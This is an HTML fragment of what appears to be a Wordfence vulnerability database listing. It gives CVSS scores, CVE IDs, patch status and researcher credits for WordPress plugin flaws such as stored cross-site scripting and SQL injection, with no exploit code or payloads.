<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2013b9ac-7853-40b9-8bef-7207ccd58eb1" target="_blank" rel="noopener">miniorange otp verification &lt;= 5.5.1 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61957" target="_blank" rel="noopener noreferrer">							CVE-2026-61957						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-otp-verification" target="_blank" rel="noopener">miniOrange OTP Login, Verification and SMS Notifications</a> <span class="wfvr-software-slug">[miniorange-otp-verification]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tarcisio-luchesipoystick" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2e52c2cb2bdde3798dc1a0ad0bab7470.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2e52c2cb2bdde3798dc1a0ad0bab7470"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tarcisio-luchesipoystick" target="_blank" rel="noopener">Tarcísio Luchesi(Poystick)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2013b9ac-7853-40b9-8bef-7207ccd58eb1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/90c4441e-3578-4bb0-befe-cfedcb5c1a71" target="_blank" rel="noopener">Rank Math SEO – AI SEO Tools to Dominate SEO Rankings &lt;= 1.0.274.1 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66702" target="_blank" rel="noopener noreferrer">							CVE-2026-66702						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/seo-by-rank-math" target="_blank" rel="noopener">Rank Math SEO – AI SEO Tools to Dominate SEO Rankings</a> <span class="wfvr-software-slug">[seo-by-rank-math]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/90c4441e-3578-4bb0-befe-cfedcb5c1a71" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f432f32c-9ebb-4444-baf0-d523b1ceba02" target="_blank" rel="noopener">Simple Link Directory Pro &lt;= 15.0.6 &#8211; Unauthenticated Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61953" target="_blank" rel="noopener noreferrer">							CVE-2026-61953						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-link-directory-pro" target="_blank" rel="noopener">Simple Link Directory Pro &#8211; AI Powered</a> <span class="wfvr-software-slug">[simple-link-directory-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener">luc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f432f32c-9ebb-4444-baf0-d523b1ceba02" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/879df622-ca6a-45ea-b8f9-e3882d4bfff7" target="_blank" rel="noopener">Simply Schedule Appointments &lt;= 1.6.12.10 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65513" target="_blank" rel="noopener noreferrer">							CVE-2026-65513						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simply-schedule-appointments" target="_blank" rel="noopener">Simply Schedule Appointments</a> <span class="wfvr-software-slug">[simply-schedule-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/whitebyte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/59130a0d7d2c05091f16f97f2632ad64.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="59130a0d7d2c05091f16f97f2632ad64"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/whitebyte" target="_blank" rel="noopener">whitebyte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/879df622-ca6a-45ea-b8f9-e3882d4bfff7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/15e90f19-e4cb-4096-8192-85d4f1f5ec24" target="_blank" rel="noopener">Social Share, Social Login and Social Comments Plugin – Super Socializer &lt;= 7.14.5 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65544" target="_blank" rel="noopener noreferrer">							CVE-2026-65544						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/super-socializer" target="_blank" rel="noopener">Social Share, Social Login and Social Comments Plugin – Super Socializer</a> <span class="wfvr-software-slug">[super-socializer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lqc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/028356566add2ba7dc84bb512e36fc3e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="028356566add2ba7dc84bb512e36fc3e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lqc" target="_blank" rel="noopener">lqc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/15e90f19-e4cb-4096-8192-85d4f1f5ec24" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/222079a2-20f1-4d53-8420-46ccc50988a8" target="_blank" rel="noopener">Spam protection, AntiSpam, FireWall by CleanTalk &lt;= 6.82 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65437" target="_blank" rel="noopener noreferrer">							CVE-2026-65437						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect" target="_blank" rel="noopener">Spam protection, Honeypot, Anti-Spam by CleanTalk</a> <span class="wfvr-software-slug">[cleantalk-spam-protect]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/222079a2-20f1-4d53-8420-46ccc50988a8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/79d4d776-411e-45ec-aff7-23453e686bf2" target="_blank" rel="noopener">StoreGrowth: Smart Sales Booster for WooCommerce | BOGO, Upsells, Direct Checkout, Quick View, Side Cart &lt;= 2.1.0 &#8211; Unauthenticated Stored Cross-Site Scripting via &#8216;message_popup&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13440" target="_blank" rel="noopener noreferrer">							CVE-2026-13440						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/storegrowth-sales-booster" target="_blank" rel="noopener">StoreGrowth – Upsell, BOGO, Quick View, Direct Checkout &amp; Side Cart for WooCommerce</a> <span class="wfvr-software-slug">[storegrowth-sales-booster]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chawabhon-netisingha-jnx03" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01d45ecf2afce2efacfa60186c282224.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01d45ecf2afce2efacfa60186c282224"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chawabhon-netisingha-jnx03" target="_blank" rel="noopener">Chawabhon Netisingha (JNX03)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/79d4d776-411e-45ec-aff7-23453e686bf2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7e898e40-2cc3-4b5a-833b-899e9c9f26d3" target="_blank" rel="noopener">Subscriptions for WooCommerce &lt;= 2.0.0 &#8211; Missing Authorization to Authenticated (Shop Manager+) Arbitrary Plugin Installation via wps_sfw_install_plugin_configuration AJAX Action</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15397" target="_blank" rel="noopener noreferrer">							CVE-2026-15397						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/subscriptions-for-woocommerce" target="_blank" rel="noopener">Subscriptions for WooCommerce</a> <span class="wfvr-software-slug">[subscriptions-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7e898e40-2cc3-4b5a-833b-899e9c9f26d3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/922c029e-57a9-4c18-8598-9ea3bbc2ab69" target="_blank" rel="noopener">Ultimate Addons for Contact Form 7 &lt;= 3.5.45 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65439" target="_blank" rel="noopener noreferrer">							CVE-2026-65439						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-addons-for-contact-form-7" target="_blank" rel="noopener">Ultra Addons for Contact Form 7</a> <span class="wfvr-software-slug">[ultimate-addons-for-contact-form-7]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/851f04ad769b87bcc7fe5afe8300abd1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851f04ad769b87bcc7fe5afe8300abd1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener">Nguyen Ba Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/922c029e-57a9-4c18-8598-9ea3bbc2ab69" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c77b357e-4bcd-45e2-9a84-7d299fcfdd88" target="_blank" rel="noopener">wpDataTables (Premium) &lt;= 7.5.1 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65509" target="_blank" rel="noopener noreferrer">							CVE-2026-65509						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdatatables-2" target="_blank" rel="noopener">wpDataTables – WordPress Data Table, Dynamic Tables &amp; Table Charts Plugin</a> <span class="wfvr-software-slug">[wpdatatables]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vantastic" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ba04da1dd94296eb4136b3e7bd671e6c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ba04da1dd94296eb4136b3e7bd671e6c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vantastic" target="_blank" rel="noopener">VanTastic</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c77b357e-4bcd-45e2-9a84-7d299fcfdd88" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/baca279b-0c42-48a9-930a-8d0525066e0a" target="_blank" rel="noopener">Payment forms, Buy now buttons, and Invoicing System | GetPaid &lt;= 2.8.56 &#8211; Authenticated (Administrator+) Local File Inclusion via Payment Form &#8216;type&#8217; Element Field</a></h4>
<div class="cvss-score-badge">6.6</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.6 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17605" target="_blank" rel="noopener noreferrer">							CVE-2026-17605						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/invoicing" target="_blank" rel="noopener">Payment forms, Buy now buttons, and Invoicing System | GetPaid</a> <span class="wfvr-software-slug">[invoicing]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/baca279b-0c42-48a9-930a-8d0525066e0a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d352e4d1-92ab-482b-8fce-90ee3e22ba3c" target="_blank" rel="noopener">Advanced Views &lt;= 3.9.1 &#8211; Missing Authorization to Authenticated (Subscriber+) Sensitive Information Exposure via &#8216;view-refresh&#8217; and &#8216;card-refresh&#8217; REST Endpoints</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17580" target="_blank" rel="noopener noreferrer">							CVE-2026-17580						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-views" target="_blank" rel="noopener">Advanced Views – Display Custom Fields (ACF, Pods, MetaBox), Posts, CPT and Woo Products anywhere in Gutenberg, Elementor, Divi, Beaver…</a> <span class="wfvr-software-slug">[acf-views]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d352e4d1-92ab-482b-8fce-90ee3e22ba3c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/582fa92d-8e52-49a9-94ce-f1b49229f591" target="_blank" rel="noopener">Chaty Pro &lt;= 3.5.5 &#8211; Authenticated (Subscriber+) SQL Injection via &#8216;widget_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-6251" target="_blank" rel="noopener noreferrer">							CVE-2026-6251						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chaty-pro" target="_blank" rel="noopener">Chaty Pro</a> <span class="wfvr-software-slug">[chaty-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/582fa92d-8e52-49a9-94ce-f1b49229f591" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/836af607-a9cb-4ea2-b3e8-0cd42a04254b" target="_blank" rel="noopener">Creative Mail – Easier WordPress &amp; WooCommerce Email Marketing &lt;= 1.6.9 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65547" target="_blank" rel="noopener noreferrer">							CVE-2026-65547						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/creative-mail-by-constant-contact" target="_blank" rel="noopener">Creative Mail – Easier WordPress &amp; WooCommerce Email Marketing</a> <span class="wfvr-software-slug">[creative-mail-by-constant-contact]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
